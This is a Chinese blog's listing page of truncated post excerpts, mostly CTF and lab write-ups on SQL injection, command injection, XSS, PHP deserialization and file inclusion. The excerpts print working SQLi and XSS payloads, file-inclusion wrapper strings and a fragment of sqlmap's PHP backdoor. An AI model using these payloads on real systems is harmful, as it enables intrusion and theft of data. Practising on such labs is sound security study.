- 博客(35)
- 收藏
- 关注
原创 选做题-1 彩虹瓶 (100 point(s))
彩虹瓶的制作过程(并不)是这样的:先把一大批空瓶铺放在装填场地上,然后按照一定的顺序将每种颜色的小球均匀撒到这批瓶子里。假设彩虹瓶里要按顺序装 N 种颜色的小球(不妨将顺序就编号为 1 到 N)。现在工厂里有每种颜色的小球各一箱,工人需要一箱一箱地将小球从工厂里搬到装填场地。如果搬来的这箱小球正好是可以装填的颜色,就直接拆箱装填;如果不是,就把箱子先码放在一个临时货架上,码放的方法就是一箱一箱堆上去。当一种颜色装填完以后,先看看货架顶端的一箱是不是下一个要装填的颜色,如果是就取下来装填,否则去工厂里再搬一
2021-11-28 18:07:12
204
原创 Java oop
//零钱通项目package com.javalearn.smallchange_;import java.text.SimpleDateFormat;import java.util.Date;import java.util.Scanner;public class SmallChangeSys { public static void main(String[] args) { new Menu().mainMenu(); }}class Menu
2021-10-09 16:01:15
142
原创 sqlmap
sqlmapSqlmap使用详解 - 安全客,安全资讯平台 (anquanke.com)路径是绝对路径,且可以写入文件sqlmap --os-shell会生成两个php文件一个是文件上传,一个是后门文件。。。//后门<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!e
2021-09-22 16:53:38
292
原创 # SQLILABS 34-61
SQLILABS 34-61level 34十六进制代替 " "里的东西1 �’union select 1,group_concat(schema_name) from information_schema.schemata #1 �’union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x63746673686f77 #level 35有点直接。。。数字型注入???
2021-07-23 22:18:12
339
原创 SQLLABS 20-33
SQLLABS 20-33第二十一关记得base64编码admin’) or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#admin’) or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.
2021-07-22 21:13:20
204
原创 SQLILABS穿关记录
SQLILABS穿关记录注:本文脚本需要根据自身情况修改第一关?id=1’ or 1=1 %23 //字符型注入?id=1’ or 1=1 union select 1,2,3,4%23 //报错字段为3?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //爆全部库库名 challenges,ctftraining,information_schema,mysql,pe
2021-07-21 21:00:00
186
原创 php特性
php特性正则解释器:https://regexper.com/在线转码:https://www.matools.com/hexweb89<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(
2021-07-20 21:24:28
331
2
原创 命令注入ctfshow
title: CTFshow命令注入date: 2021-07-15tags: [ctf]description: 刷题记录搜索引擎http://helosec.com/正则解释https://regexper.com/web31<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/.
2021-07-20 21:21:36
538
原创 审 强网先锋 赌徒 来学反序列化
审 强网先锋 赌徒 来学反序列化<meta charset="utf-8"><?phperror_reporting(1);class Start{ public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public function __construct(){ echo "I think you need /etc/hint
2021-07-20 21:15:23
201
原创 PHP Parametric Function RCE(套娃)
PHP Parametric Function RCE无参数RCEif(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}/[^\W]+\((?R)?\)/ #R为正则本身例题<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!
2021-07-20 21:13:54
331
原创 preg_replace
<?php$id = $_GET['id'];$_SESSION['id'] = $id;function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")', $str );}foreach($_GET as $re => $str) { echo complex($re, $str). "\.
2021-07-20 21:13:22
140
原创 SSTI学习(Flask)
SSTI学习(Flask)本地环境docker vulhubfrom flask import Flask, requestfrom jinja2 import Templateapp = Flask(__name__)@app.route("/")def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render()if __na
2021-07-19 22:20:57
236
原创 # php反序列化
php反序列化PHP反序列化的漏洞,通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =
2021-07-19 22:20:26
136
原创 [极客大挑战 2019]Http
BUUCTF刷题记录[极客大挑战 2019]Http查看源码。。。一开始找不到,藏的真深。。。真难找!!复习一遍请求头修改来源 RefererReferer: https://www.Sycsecret.com提示修改浏览器提示不是本地访问修改X-Forward-For:127.0.0.1...
2021-07-19 12:21:26
126
原创 [极客大挑战 2019]Knife
BUUCTF刷题记录[极客大挑战 2019]Knife菜刀emmm我用的蚁剑没差菜刀后门多蚁剑github上下载
2021-07-18 17:17:29
413
原创 [极客大挑战 2019]LoveSQL
BUUCTF刷题记录[极客大挑战 2019]LoveSQL万能密码登录不直接显示密码开始注入1’ or 1=1 order by 3#1’ or 1=1 order by 4#说明字段为3开始判断回显点-1’ union select 1,2,3#查库查水表-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#-1’
2021-07-18 17:13:54
175
2
原创 [ACTF2020 新生赛]Exec
BUUCTF刷题记录[ACTF2020 新生赛]Exec什么都没有过滤尽情发挥!!记得了解一波Linux的命令下面的copy Y4师傅的 侵删ls显示当前目录下的文件cd后跟路径名,进入指定路径比如cd /回到根目录pwd显示当前所在的目录vim首先,vim是一个编辑器创建文件vim 1.txttouchtouch 1.txt也是创建文件mkdir -pmkdir 111创建目录mkdir -p 111/2/3/4/5创建多级目录rmdir删除目录rm –r –
2021-07-18 16:31:57
359
原创 [极客大挑战 2019]Secret File
BUUCTF刷题记录[极客大挑战 2019]Secret File找到php文件,切进去点根据提示切回去看看抓包发到repeatersend发现secr3t.php切入strstr — 查找字符串的首次出现;并返回字符串的剩余部分:对大小写区分stristr() 函数搜索字符串在另一字符串中的第一次出现。并返回字符串的剩余部分:对大小写不区分php伪协议绕过secr3t.php?file=php://filter/read=convert.base64-encode/r
2021-07-18 16:26:35
127
原创 [SUCTF 2019]EasySQL
BUUCTF刷题记录[SUCTF 2019]EasySQL数字型注入??过滤 and or堆叠注入原理执行多句sql 语句1;show databases;爆库1;show tables;爆表查水表1;show columns from Flag;查不出来,应该是被过滤了看一下大佬的wp解法1输入的内容为*,1内置的sql语句为s q l = " s e l e c t " . sql = “select “.sql=“select”.post[‘query’].”||f
2021-07-18 16:11:23
189
原创 [ACTF2020 新生赛]Include
BUUCTF刷题记录[ACTF2020 新生赛]Include文件包含漏洞?php的伪协议复习一下:php://filter/read=convert.base64-encode/resource=flag.php配合base64解码食用input 用法:?file=php://input[POST DATA部分]<?php phpinfo(); ?>input貌似不能用...
2021-07-18 15:53:17
112
原创 [强网杯 2019]随便注
BUUCTF刷题记录[强网杯 2019]随便注爆库1’;show databases;#爆表1’;show tables;#爆字段名1’;show columns from 1919810931114514;#修改表名的语法:alter table rename to/as new_tablename;修改列的属性:table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci N
2021-07-18 15:40:12
117
原创 [HCTF 2018]WarmUp
BUUCTF刷题记录[HCTF 2018]WarmUp按F12进入source.php审计一下代码查看hint.phpmb_substr()函数返回字符串的一部分,之前我们学过 substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用 mb_substr()。$_page = mb_substr( $page, 0, mb_strpos($page . '?', '?')
2021-07-18 15:09:31
95
原创 # SQL
SQLload_file()函数读取一个文件并将其内容作为字符串返回 其中file_name是文件的完整路径。堆叠注入1';show databases;#1';show tables;#1';show columns from FlagHere;#1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#一个知识点:HANDLER … OPEN语句打开一个表,使其可以使用后续
2021-07-17 21:16:03
126
原创 # php反序列化
php反序列化PHP反序列化的漏洞,通过控制read()读取flag.php的内容。<?php include("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =
2021-07-17 21:15:31
140
原创 # XSS闯关
XSS闯关思路:闭合事件闭合标签xss语句οnclick=alert(1)<a href=javascript:alert(‘xss’)>level 1直接输入level 2输入查看源码发现被转义 无法注入<>在源码这边搞事情,前后闭合"><script>alert('xss')</script>level 3'οnclick='alert(“xss”)'()未转义转义”<>level 4"οnclick
2021-07-17 21:13:36
198
1
原创 写题记录
写题记录先看代码<?php error_reporting(0);if(!sizeof($_GET))highlight_file(__FILE__);?><?=(ob_end_flush()?"":""),(ob_start()?"":"")?><?=array_pop($_GET);?><?=(ob_start(ob_get_clean())?array_pop($_GET):""),"",(ob_end_flush()?"":"")?>
2021-06-11 00:06:13
159
原创 PTA-c++刷题记录
还没对答案,两天后记得来对答案1-1函数的参数个数和类型都相同,只是返回值不同,这不是重载函数。T1-2重载函数可以带有默认值参数,但是要注意二义性。T1-3多数运算符可以重载,个别运算符不能重载,运算符重载是通过函数定义实现的。T1-4对每个可重载的运算符来讲,它既可以重载为友元函数,又可以重载为成员函数,还可以重载为非成员函数。F1-5对单目运算符重载为友元函数时,可以说明一个形参。而重载为成员函数时,不能显式说明形参。T1-6重载运算符可以保持原运算符的优先级和结合性不变。T
2021-06-09 12:13:47
344
原创 [极客大挑战 2019]Knife
[极客大挑战 2019]Knife打开网页一句话木马,尝试连接抱歉,没有菜刀,但是有蚁剑连接成功翻目录找到flag刀呢??
2021-06-07 12:36:25
80
原创 [极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File查看源码点secret继续查看源码没发现什么东西回退抓个包看看有一个secr3t.php去打开有个flag.php打开很调皮,退回去看代码,猜测有文件包含漏洞过滤了…/ tp input date用伪协议payload ?file=php://filter/read=convert.base64-encode/resource=flag.php用base64解码得到flag...
2021-06-07 00:26:39
102
1
原创 [极客大挑战 2019]EasySQL
[极客大挑战 2019]EasySQL点开链接简单的sql注入尝试万能密码 1’ or 1 = 1 #得到flag这是我做过最简单的题了
2021-06-05 18:24:21
105
原创 [HCTF 2018]WarmUp
[HCTF 2018]WarmUp一些函数empty() 函数用于检查一个变量是否为空。bool empty ( mixed $var )当 var 存在,并且是一个非空非零的值时返回 FALSE 否则返回 TRUE。以下的变量会被认为是空的:"" (空字符串)0 (作为整数的0)0.0 (作为浮点数的0)"0" (作为字符串的0)NULLFALSEarray() (一个空数组)$var; (一个声明了,但是没有值的变量)is_string函数is_string ( mix
2021-06-05 18:02:46
345
1
原创 2021-05-29
5-29今日摸鱼晚上打完游戏10.30开始看爬虫,看崔庆才的爬虫教程。看完正则表达式后实操爬猫眼top100遇见问题1 无法打印电影信息我猜应该是请求头的原因就想用bp抓一下包但是bp这是啥代理没连上2 bp代理没接上时间12.30舍友催我睡觉,我把电脑关了上床,问了一下同学,可能是端口被占用了,我用pad打开向日葵,改了改,最后是因为端口前面那个√没有打上,真是SB。然后拿着user-agent去做header。发现还是不行,检查一下,发现网页要验证,然后在优快云上查其他佬的博文,发现
2021-05-29 02:32:23
258
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅